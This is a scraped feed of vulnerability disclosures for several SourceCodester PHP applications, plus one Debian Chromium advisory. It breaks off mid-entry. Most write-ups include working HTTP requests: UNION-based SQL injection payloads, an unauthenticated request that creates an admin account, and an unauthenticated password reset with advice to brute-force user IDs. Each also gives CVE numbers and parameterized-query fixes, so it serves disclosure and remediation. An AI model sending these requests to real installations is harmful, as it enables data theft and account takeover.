Music Gallery Site version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Music Gallery Site - SQL Injection on page music_list.php and parameter cid is vulnerable, application url is (?page=music_list&cid=?). >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0938](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0938)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0938) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0938)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> music_list.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: /?page=music_list&cid=*### Description:> The Music Gallery site does have public pages for music library, on music list there is an SQL injection to filter out the music list with category basis.### Proof of Concept:> Following steps are involved:1. Go to the category menu and click on view category.2. In URL, there is a parameter 'cid' which is vulnerable to SQL injection (?page=music_list&cid=4*)### Request:```GET /php-music/?page=music_list&cid=5%27+and+false+union+select+1,version(),database(),4,5,6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220299762-3a0c02cf-364b-49a0-81e5-e7f3f6ed298b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `category_list` where `id` = :id and `delete_flag` = 0 and `status` = 1");$sql->bindparam(':id', $cid);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page view_music_details.php and parameter id is vulnerable. >Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0961](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0961)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0961) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0961)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/view_music_details.php?id=*### Affected Page:> view_music_details.php> On this page cid parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/view_music_details.php?id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on info button any music the popup will appear on the same page. However, on backend server calls the file view_music_detail.php where Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on view info of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (view_music_details.php?id=1*)### Request:```GET /php-music/view_music_details.php?id=1%27+and+false+union+select+1,version(),database(),4,@@datadir,6,7,8,9,10,11--+- HTTP/1.1Host: localhostsec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220317330-519b0112-85fd-4c6f-bf35-446216d73549.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * from `music_list` where id = :id and delete_flag = 0");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading---------------------------------------------------------------------------------------------# Music Gallery Site - SQL Injection on page Master.php and parameter id is vulnerable. > Any remote attacker can access this page to exploit the vulnerbility.### Date: > 21 February 2023### CVE Assigned:**[CVE-2023-0962](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0962)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0962) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0962)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.# Vulnerable URL:> URL: php-music/classes/Master.php?f=get_music_details&id=*### Affected Page:> Master.php> On this page, there is "get_music_details" in that id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: php-music/classes/Master.php?f=get_music_details&id=*### Description:> The Music Gallery site does have public pages for music library. Whenever someone click on play button any music the popup will appear on the same page. However, on backend server calls the file Master.php, in that file "get_music_details" is running the music and this function Get id parameter is vulnerable to SQL Injection.### Proof of Concept:> Following steps are involved:1. Go to the music list and click on play button of any music.2. intercept the traffic through burp and get the actual URL3. In URL, there is a parameter 'id' which is vulnerable to SQL injection (Master.php?f=get_music_details&id=1*)### Request:```GET /php-music/classes/Master.php?f=get_music_details&id=1%27+and+false+union+select+1,version(),@@datadir,4,5,6,7,8,9,10,11--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Linux"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=a5fd11866a86264db3a68bb1817b2c7fConnection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/220339548-20e31f82-cab4-4732-8cf7-8a146c2c1d5b.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT * FROM `music_list` where `id` = :id");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading

Music Gallery Site 1.0 SQL Injection

Music Gallery Site version 1.0 suffers from a missing authentication vulnerability that allows for privilege escalation.

# Music Gallery Site - Broken Access Control leads to compromise of complete application by adding admin user without log-in into the application.

### Date:   
> 21 February 2023

### CVE Assigned:  
**[CVE-2023-0963](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0963)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0963) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0963)

### Author Email:   
> navaidnasari@hotmail.co.uk  
### Vendor Homepage:  
> https://www.sourcecodester.com  
### Software Link:  
> [Music Gallery Site](https://www.sourcecodester.com/php/16073/music-gallery-site-using-php-and-mysql-database-free-source-code.html)  
### Version:  
> v 1.0  
### Broken Authentication:  
> Broken Access Control is a type of security vulnerability that occurs when a web application fails to properly restrict users' access to certain resources and functionality. Access control is the process of ensuring that users are authorized to access only the resources and functionality that they are supposed to. Broken Access Control can occur due to poor implementation of access controls in the application, failure to validate input, or insufficient testing and review.

### Vulnerable URLs:  
> /php-music/classes/Users.php

>/php-music/classes/Master.php

### Affected Page:  
> Users.php , Master.php  
> On these page, application isn't verifying the authenticated mechanism. Due to that, all the parameters are vulnerable to broken access control and any remote attacker could create and update the data into the application. Specifically, Users.php could allow to remote attacker to create a admin user without log-in to the application.  
### Description:  
> Broken access control allows any remote attacker to create, update and delete the data of the application. Specifically, adding the admin users  
### Proof of Concept:  
> Following steps are involved:  
1. Send a POST request with required parameter to Users.php?f=save (See Below Request)

2. Request:  
```  
POST /php-music/classes/Users.php?f=save HTTP/1.1  
Host: localhost  
Content-Length: 876  
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"  
Accept: */*  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryjwBNagY7zt6cjYHp  
X-Requested-With: XMLHttpRequest  
sec-ch-ua-mobile: ?0  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36  
sec-ch-ua-platform: "Linux"  
Origin: http://localhost  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://localhost/php-music/admin/?page=user/manage_user  
Accept-Encoding: gzip, deflate  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="id"

------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="firstname"

Test  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="middlename"

Admin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="lastname"

Check  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="username"

testadmin  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="password"

test123  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="type"

1  
------WebKitFormBoundaryjwBNagY7zt6cjYHp  
Content-Disposition: form-data; name="img"; filename=""  
Content-Type: application/octet-stream

------WebKitFormBoundaryjwBNagY7zt6cjYHp--

```

3. It will create the user by defining the valid values (see below screenshot of successfull response), Successful exploit screenshots are below (without cookie parameter)

![image](https://user-images.githubusercontent.com/123810418/220352229-389dfaf8-57e0-470d-b8a5-c873a13b3b51.png)

![image](https://user-images.githubusercontent.com/123810418/220352493-ef35a8ba-c613-4745-9004-0159b3841951.png)

4. Vulnerable Code Snippets:

Users.php

![image](https://user-images.githubusercontent.com/123810418/220353008-b1448508-7451-412a-a5eb-049aa20b3d41.png)

Master.php

![image](https://user-images.githubusercontent.com/123810418/220353132-1067a86c-282d-4fc5-8733-ceab4b1fef56.png)

### Recommendation:  
> Whoever uses this CMS, should update the authorization mechanism on top of the  Users.php , Master.php pages as per requirement to avoid a Broken Access Control attack:

Music Gallery Site 1.0 Privilege Escalation / Missing Authentication

Employee Task Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Employee Task Management System - SQL Injection on (task-details.php?task_id=?) with low privilege authentication### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0904](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0904)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0904), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0904)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> task-details.php> On this page task_id parameter is vulnerable to SQL Injection Attack### Description:> The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (view and edit only assigned tasks) and Attendance (clock In and out)> So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by viewing that task from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ Admin assigned a task to an employee (ABC)+ ABC employee view the task and could perform the SQL injection with vulnerable parameter (task-details.php?task_id=765)### Request:```GET /etms/task-details.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7,8--+- HTTP/1.1Host: localhostCache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219780565-6fb7a74b-ac7f-4ec2-997a-3c69abdf37f7.png)### Recommendation:> Whoever uses this CMS, should update line no (from 27 to 30) of task-details.php with the following code to avoid SQL Injection attack:```Old Code:$sql = "SELECT a.*, b.fullname FROM task_info aLEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id)WHERE task_id='$task_id'";$info = $obj_admin->manage_all_info($sql);``````New Code: $sql = $obj_admin->db->prepare("SELECT a.*, b.fullname FROM task_info a LEFT JOIN tbl_admin b ON(a.t_user_id = b.user_id) WHERE task_id=:task_id ");$sql->bindparam(':task_id', $task_id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo-------------------------------------------------# Employee Task Management System - SQL Injection with low privilege authentication### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0902](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0903)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0903), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0903)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> edit-task.php> On this page task_id parameter is vulnerable to SQL Injection Attack### Description:> The employee task management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.s. Task Management (only assigned tasks) and Attendance (clock In and out)> So, if the admin assigns a task to a normal employee, an employee could perform the SQL Injection by editing that task from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ Admin assigned a task to an employee (ABC)+ ABC employee edit the task and could perform the SQL injection with vulnerable parameter (edit-task.php?task_id=765)### Request:```GET /etms/edit-task.php?task_id=765%27+and+false+union+select+1,version(),3,database(),user(),6,7--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219764941-37ede104-c4a5-4500-94f2-2fca6e051343.png)### Recommendation:> Whoever uses this CMS, should update line no 27 and 28 of edit-task.php with the following code to avoid SQL Injection attack:```Old Code:$sql = "SELECT * FROM task_info WHERE task_id='$task_id' ";$info = $obj_admin->manage_all_info($sql);``````New Code: $sql = $obj_admin->db->prepare("SELECT * FROM task_info WHERE task_id=:task_id ");$sql->bindparam(':task_id', $task_id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Employee Task Management System 1.0 SQL Injection

Employee Task Management System version 1.0 suffers from a privilege escalation vulnerability due to a broken access control where a lower privileged user's cookie can be leveraged to takeover an administrative account.

    # Employee Task Management System - Broken Authentication leads to compromise of all application accounts by changing the password### Date: > 17 February 2023### CVE Assigned:**[CVE-2023-0905](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0905)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0905), [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0905)### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Employee Task Management System](https://www.sourcecodester.com/php/15383/employee-task-management-system-phppdo-free-source-code.html)### Version:> v 1.0### Broken Authentication:> Broken authentication occurs when the authentication mechanisms in a web application are not implemented correctly, allowing an attacker to bypass them and gain unauthorized access to the application's features and resources. If an attacker is able to exploit broken authentication and gain access to a user's account, they may be able to change the account password, effectively locking the legitimate user out of the system. This is particularly dangerous because if the attacker can compromise one user account, they may be able to use that account to gain access to other accounts and escalate their privileges, potentially compromising the entire system.### Affected Page:> changePasswordForEmployee.php> On this page, application isn't verifying the authentication/authorization mechanism. Due to that, all the parameters are vulnerable to broken authentication.### Description:> Broken Authentication allows unauthenticated remote attacker to change password of all application users### Proof of Concept:> Following steps are involved:1. Visit the vulnerable page: changePasswordForEmployee.php2. Type any random password which needs to update against any user id and submit3. Intercept that request through Burp Suite4. Request:```POST /etms/changePasswordForEmployee.php HTTP/1.1Host: localhostContent-Length: 277Cache-Control: max-age=0sec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/etms/changePasswordForEmployee.phpAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=ntknjcf821q2u3h85c14qo1r91Connection: closeuser_id=%3Cbr+%2F%3E%0D%0A%3Cb%3EWarning%3C%2Fb%3E%3A++Undefined+variable+%24user_id+in+%3Cb%3EC%3A%5Cxampp%5Chtdocs%5Cetms%5CchangePasswordForEmployee.php%3C%2Fb%3E+on+line+%3Cb%3E34%3C%2Fb%3E%3Cbr+%2F%3E%0D%0A&password=admin%23123&re_password=admin%23123&change_password_btn=```5. because the "user_id" parameter is not set due to missing authentication, so we need to set the user_id manually. By default user_id 1 is for admin and we can use intruder to bruteforce this step with incremental value. Whenever the server will find the correct user_id, it will change the password and log in to the application.6. Successful exploit screenshots are below (without cookie parameter)![image](https://user-images.githubusercontent.com/123810418/219798138-747388d7-378b-4d1b-9862-1356e52a0c72.png)![image](https://user-images.githubusercontent.com/123810418/219798264-f04bcda9-a833-4010-a40b-076a38199938.png)![image](https://user-images.githubusercontent.com/123810418/219798299-5ba92752-d218-4aaa-b123-5258df37ce38.png)7. Vulnerable Code Snippets:![image](https://user-images.githubusercontent.com/123810418/219799518-50d3eb1a-0091-4229-b7d0-7621d79cc168.png)![image](https://user-images.githubusercontent.com/123810418/219799657-42b9a71c-539c-4e91-bec8-0d7fd40cb3ed.png)### Recommendation:> Whoever uses this CMS, should update the authentication and authorization mechanism on top of the changePasswordForEmployee.php as per their requirement to avoid a Broken Authentication attackThank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo

Employee Task Management System 1.0 Privilege Escalation

Debian Linux Security Advisory 5359-1 - Multiple security issues were discovered in Chromium, which could result in the execution of arbitrary code, denial of service or information disclosure.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5359-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffFebruary 23, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : chromiumCVE ID         : CVE-2023-0927 CVE-2023-0928 CVE-2023-0929 CVE-2023-0930                  CVE-2023-0931 CVE-2023-0932 CVE-2023-0933 CVE-2023-0941Multiple security issues were discovered in Chromium, which could resultin the execution of arbitrary code, denial of service or informationdisclosure.For the stable distribution (bullseye), these problems have been fixed inversion 110.0.5481.177-1~deb11u1.We recommend that you upgrade your chromium packages.For the detailed security status of chromium please refer toits security tracker page at:https://security-tracker.debian.org/tracker/chromiumFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmP34kwACgkQEMKTtsN8TjZFwhAAk2JqYKeasa9sMSwiBcpaz+HBtIimsS/ue/TIddRuwcUwpif2qSF+QyL6ac1Wc/jIwW4F7OY9d5Ww8AkvGnxcdzt9dI+g3lPUDByqYJutWahICxm6ZBxrY2ms0NbTYK4hzFBVyobfnQF/EzOGLpyarauFTjBW1sbtCSFnXYeMHd5+rpw5bYTx5JZPoG2fGHuAcXE2CoKGm41tqzegYdKrv33eID3EB91ne/oMqTp4/q1QEVeZiQ0JdRPHq8fJG+FOdPdU3K/eROkkxvakd+QCTcGetKONQ0HFkr43BLP8EAMBAbg4Ds+zaJ+xgenHusSrN+Q7MQraYgqZ6DInzrJXBeeXSu9zm+iwEpJXuerQv3iYDn0o75gzL+qtoh31mePFB6jihIgHo0adqu6upNedFGe+YY1RuJuYWlw2cvjagdaSgotuGbNirXXDYUlQMA82eu+d3yv1hexkbCNQGykGOmuF7J2O+Vwb34Hf6MlDAxrdOuaEcxw8siOsa/MhXKYT1nmxASizffo2mmk/HJatqoTQXtxOWaVIv2Q/ySCc9WsESCRzh1J1gjf8+RH3T/O6T1EfM5oKi4bEZMhcxPhM+ue2DpBxVIB1qPDlOOsqQeLfaBwdcqmeXIl+pZhQBsB9A6okzNfoktEKUysQkKRlTPSl9QCQpd/cdVCwFMfXWA0==4fPc-----END PGP SIGNATURE-----

Debian Security Advisory 5359-1

Auto Dealer Management System version 1.0 suffers from multiple remote SQL injection vulnerabilities.

    # Auto Dealer Management System - SQL Injection on page view_transaction.php and parameter is id, application url is (?page=vehicles/view_transaction&id=?) with low privilege authentication### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0912](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0912)** [mitre.org](https://www.cve.org/CVERecord?id=CVE-2023-0912) [nvd.nist.org](https://nvd.nist.gov/vuln/detail/CVE-2023-0912)### Author Name: > Muhammad Navaid Zafar Ansari### Author Email: > navaidnasari@hotmail.co.uk### Vendor Homepage:> https://www.sourcecodester.com### Software Link:> [Auto Dealer Management System](https://www.sourcecodester.com/php/15371/auto-dealer-management-system-phpoop-free-source-code.html)### Version:> v 1.0### SQL Injection> SQL Injection is a type of vulnerability in web applications that allows an attacker to execute unauthorized SQL queries on the database by exploiting the application's failure to properly validate user input. The attacker can use this vulnerability to bypass the security measures put in place by the application, allowing them to access or modify sensitive data, or even take control of the entire system. SQL Injection attacks can have severe consequences, including data loss, financial loss, reputational damage, and legal liability. To prevent SQL Injection attacks, developers should properly sanitize and validate all user input, and implement strong security measures, such as input validation, output encoding, parameterized queries, and access controls. Users should also be aware of the risks of SQL Injection attacks and take appropriate measures to protect their data.### Affected Page:> view_transaction.php> On this page id parameter is vulnerable to SQL Injection Attack> URL of the vulnerable parameter is: ?page=vehicles/view_transaction&id=*### Description:> The auto dealer management system supports two roles of users, one is admin, and another is a normal employee. the detail of role is given below+ Admin user has full access to the system + Employee user has only a few menu access i.e. dashboard, car models and vehicle (available and transaction)> Employee could perform the SQL Injection by viewing the vehicle transaction from his/her profile. Therefore, low-privileged users could able to get the access full system.### Proof of Concept:> Following steps are involved:+ An employee view the vehicle transaction and could perform the SQL injection with vulnerable parameter (?page=vehicles/view_transaction&id=5*)### Request:```GET /adms/admin/?page=vehicles/view_transaction&id=5%27+and+false+union+select+1,2,3,4,5,6,7,8,9,database(),version(),12,13,user()--+- HTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="109", "Not_A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.5414.75 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Cookie: PHPSESSID=c1ig2qf0q44toal7cqbqvikli5Connection: close```### Response:![image](https://user-images.githubusercontent.com/123810418/219882001-6031474c-b28b-4401-b282-6ff470086be3.png)### Recommendation:> Whoever uses this CMS, should update the code of the application in to parameterized queries to avoid SQL Injection attack:```Example Code: $sql = $obj_admin->db->prepare("SELECT *, concat(firstname,' ',COALESCE(concat(middlename,' '), ''), lastname) as customer from `transaction_list` where id = :id ");$sql->bindparam(':id', $id);$sql->execute();$row = $sql->fetch(PDO::FETCH_ASSOC);```Thank you for reading for more demo visit my github: https://github.com/navaidzansari/CVE_Demo--------------------------------------------------------------------------# Auto Dealer Management System - SQL Injection on page sell_vehicle.php and parameter is id, application url is (?page=vehicles/sell_vehicle&id=?) with low privilege authentication### Date: > 18 February 2023### CVE Assigned:**[CVE-2023-0913](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-0913)** 